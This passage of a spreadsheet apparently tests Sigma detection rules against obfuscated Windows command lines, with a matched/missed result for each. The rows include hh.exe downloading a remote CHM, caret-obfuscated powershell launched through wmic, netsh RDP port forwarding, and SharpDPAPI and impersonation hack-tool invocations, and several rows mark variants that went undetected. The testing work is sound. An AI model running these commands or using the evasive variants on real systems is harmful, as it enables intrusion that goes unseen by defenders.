          <t>hh.exe "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm"</t>
        </is>
      </c>
      <c r="F3945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3945" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3945" s="44" t="n"/>
      <c r="K3945" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3946" ht="15.75" customHeight="1" s="42">
      <c r="A3946" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3946" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C3946" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D3946" s="44" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E3946" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c hh.exe htt^ps://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm</t>
        </is>
      </c>
      <c r="F3946" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3946" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3946" s="44" t="n"/>
      <c r="K3946" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3947" ht="15.75" customHeight="1" s="42">
      <c r="A3947" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3947" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C3947" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D3947" s="44" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E3947" s="44" t="inlineStr">
        <is>
          <t>hh.exe https:raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm</t>
        </is>
      </c>
      <c r="F3947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3947" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3947" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3947" s="44" t="n"/>
      <c r="K3947" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3948" ht="15.75" customHeight="1" s="42">
      <c r="A3948" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3948" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_chm_remote_download_or_execution</t>
        </is>
      </c>
      <c r="C3948" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE</t>
        </is>
      </c>
      <c r="D3948" s="44" t="inlineStr">
        <is>
          <t>f57c58b3-ee69-4ef5-9041-455bf39aaa89</t>
        </is>
      </c>
      <c r="E3948" s="44" t="inlineStr">
        <is>
          <t>hh.exe HTTPS://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm</t>
        </is>
      </c>
      <c r="F3948" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3948" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3948" s="44" t="n"/>
      <c r="K3948" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3949" ht="15.75" customHeight="1" s="42">
      <c r="A3949" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3949" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C3949" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D3949" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E3949" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c ^p^o^w^e^r^s^h^e^l^l Write-Output 'test'"</t>
        </is>
      </c>
      <c r="F3949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3949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949" s="44" t="n"/>
      <c r="K3949" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3950" ht="15.75" customHeight="1" s="42">
      <c r="A3950" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3950" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C3950" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D3950" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E3950" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c p""o""w""e""r""s""h""e""l""l"</t>
        </is>
      </c>
      <c r="F3950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3950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950" s="44" t="n"/>
      <c r="K3950" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3951" ht="15.75" customHeight="1" s="42">
      <c r="A3951" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B3951" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmiprvse_susp_child_processes</t>
        </is>
      </c>
      <c r="C3951" s="44" t="inlineStr">
        <is>
          <t>Suspicious WmiPrvSE Child Process</t>
        </is>
      </c>
      <c r="D3951" s="44" t="inlineStr">
        <is>
          <t>8a582fe2-0882-4b89-a82a-da6b2dc32937</t>
        </is>
      </c>
      <c r="E3951" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c msiexec.exe /i C:\path\package.msi"</t>
        </is>
      </c>
      <c r="F3951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3951" s="44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3951" s="44" t="n"/>
      <c r="K3951" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3952" ht="15.75" customHeight="1" s="42">
      <c r="A3952" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3952" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C3952" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3952" s="44" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E3952" s="44" t="inlineStr">
        <is>
          <t>netsh "interface" "portproxy" "add" "v4tov4" listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F3952" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3952" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3952" s="44" t="n"/>
      <c r="K3952" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3953" ht="15.75" customHeight="1" s="42">
      <c r="A3953" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3953" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C3953" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3953" s="44" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E3953" s="44" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F3953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3953" s="44" t="n"/>
      <c r="J3953" s="44" t="n"/>
      <c r="K3953" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3954" ht="15.75" customHeight="1" s="42">
      <c r="A3954" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3954" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C3954" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3954" s="44" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E3954" s="44" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 connectport=1337 connectaddress=127.0.0.1 listenport=1337</t>
        </is>
      </c>
      <c r="F3954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3954" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3954" s="44" t="n"/>
      <c r="K3954" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3955" ht="15.75" customHeight="1" s="42">
      <c r="A3955" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3955" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C3955" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3955" s="44" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E3955" s="44" t="inlineStr">
        <is>
          <t>netsh.exe "interface" "portproxy" add v4tov4 listenport=3389 listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F3955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3955" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3955" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3955" s="44" t="n"/>
      <c r="K3955" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3956" ht="15.75" customHeight="1" s="42">
      <c r="A3956" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3956" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C3956" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3956" s="44" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E3956" s="44" t="inlineStr">
        <is>
          <t>netsh.exe	interface	portproxy	add	v4tov4	listenport=3389	listenaddress=192.0.2.10	connectport=3389	connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F3956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3956" s="44" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3956" s="44" t="n"/>
      <c r="K3956" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3957" ht="15.75" customHeight="1" s="42">
      <c r="A3957" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3957" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C3957" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3957" s="44" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E3957" s="44" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=0x0D3D listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F3957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3957" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3957" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3957" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3957" s="44" t="n"/>
      <c r="K3957" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3958" ht="15.75" customHeight="1" s="42">
      <c r="A3958" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3958" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C3958" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3958" s="44" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E3958" s="44" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport="3389" listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F3958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3958" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3958" s="44" t="n"/>
      <c r="K3958" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3959" ht="15.75" customHeight="1" s="42">
      <c r="A3959" s="44" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B3959" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C3959" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D3959" s="44" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E3959" s="44" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=3389 listenaddress=192.0.2.10 connectport=3389 "connectaddress"=192.0.2.10</t>
        </is>
      </c>
      <c r="F3959" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3959" s="44" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J3959" s="44" t="n"/>
      <c r="K3959" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3960" ht="15.75" customHeight="1" s="42">
      <c r="A3960" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3960" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C3960" s="44" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D3960" s="44" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E3960" s="44" t="inlineStr">
        <is>
          <t>impersonate list</t>
        </is>
      </c>
      <c r="F3960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3960" s="44" t="n"/>
      <c r="J3960" s="44" t="n"/>
      <c r="K3960" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3961" ht="15.75" customHeight="1" s="42">
      <c r="A3961" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3961" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C3961" s="44" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D3961" s="44" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E3961" s="44" t="inlineStr">
        <is>
          <t>impersonate.exe	list</t>
        </is>
      </c>
      <c r="F3961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3961" s="44" t="n"/>
      <c r="J3961" s="44" t="n"/>
      <c r="K3961" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3962" ht="15.75" customHeight="1" s="42">
      <c r="A3962" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3962" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C3962" s="44" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D3962" s="44" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E3962" s="44" t="inlineStr">
        <is>
          <t>impersonate.exe "list"</t>
        </is>
      </c>
      <c r="F3962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3962" s="44" t="n"/>
      <c r="J3962" s="44" t="n"/>
      <c r="K3962" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3963" ht="15.75" customHeight="1" s="42">
      <c r="A3963" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3963" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impersonate</t>
        </is>
      </c>
      <c r="C3963" s="44" t="inlineStr">
        <is>
          <t>HackTool - Impersonate Execution</t>
        </is>
      </c>
      <c r="D3963" s="44" t="inlineStr">
        <is>
          <t>cf0c254b-22f1-4b2b-8221-e137b3c0af94</t>
        </is>
      </c>
      <c r="E3963" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c impersonate.exe li^st</t>
        </is>
      </c>
      <c r="F3963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3963" s="44" t="n"/>
      <c r="J3963" s="44" t="n"/>
      <c r="K3963" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3964" ht="15.75" customHeight="1" s="42">
      <c r="A3964" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3964" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C3964" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D3964" s="44" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E3964" s="44" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe masterkeys -password:Secret123</t>
        </is>
      </c>
      <c r="F3964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3964" s="44" t="n"/>
      <c r="J3964" s="44" t="n"/>
      <c r="K3964" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3965" ht="15.75" customHeight="1" s="42">
      <c r="A3965" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3965" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C3965" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D3965" s="44" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E3965" s="44" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe	masterkeys	/password:Secret123</t>
        </is>
      </c>
      <c r="F3965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3965" s="44" t="n"/>
      <c r="J3965" s="44" t="n"/>
      <c r="K3965" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3966" ht="15.75" customHeight="1" s="42">
      <c r="A3966" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3966" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C3966" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D3966" s="44" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E3966" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c SharpDPAPI.exe masterkeys /pass^word:Secret123</t>
        </is>
      </c>
      <c r="F3966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3966" s="44" t="n"/>
      <c r="J3966" s="44" t="n"/>
      <c r="K3966" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3967" ht="15.75" customHeight="1" s="42">
      <c r="A3967" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3967" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_dpapi_execution</t>
        </is>
      </c>
      <c r="C3967" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpDPAPI Execution</t>
        </is>
      </c>
      <c r="D3967" s="44" t="inlineStr">
        <is>
          <t>c7d33b50-f690-4b51-8cfb-0fb912a31e57</t>
        </is>
      </c>
      <c r="E3967" s="44" t="inlineStr">
        <is>
          <t>SharpDPAPI.exe masterkeys  /password:Secret123</t>
        </is>
      </c>
      <c r="F3967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3967" s="44" t="n"/>
      <c r="J3967" s="44" t="n"/>
      <c r="K3967" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3968" ht="15.75" customHeight="1" s="42">
      <c r="A3968" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3968" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C3968" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D3968" s="44" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E3968" s="44" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe	user:Administrator	binary:C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3968" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3968" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3968" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3968" s="44" t="n"/>
      <c r="J3968" s="44" t="n"/>
      <c r="K3968" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3969" ht="15.75" customHeight="1" s="42">
      <c r="A3969" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3969" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C3969" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D3969" s="44" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E3969" s="44" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe "user:Administrator" "binary:C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F3969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3969" s="44" t="n"/>
      <c r="J3969" s="44" t="n"/>
      <c r="K3969" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3970" ht="15.75" customHeight="1" s="42">
      <c r="A3970" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3970" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C3970" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D3970" s="44" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
      <c r="E3970" s="44" t="inlineStr">
        <is>
          <t>SharpImpersonation.exe  user:Administrator  binary:C:\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F3970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3970" s="44" t="n"/>
      <c r="J3970" s="44" t="n"/>
      <c r="K3970" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3971" ht="15.75" customHeight="1" s="42">
      <c r="A3971" s="44" t="inlineStr">
        <is>
          <t>t1134.001</t>
        </is>
      </c>
      <c r="B3971" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharp_impersonation</t>
        </is>
      </c>
      <c r="C3971" s="44" t="inlineStr">
        <is>
          <t>HackTool - SharpImpersonation Execution</t>
        </is>
      </c>
      <c r="D3971" s="44" t="inlineStr">
        <is>
          <t>f89b08d0-77ad-4728-817b-9b16c5a69c7a</t>
        </is>
      </c>
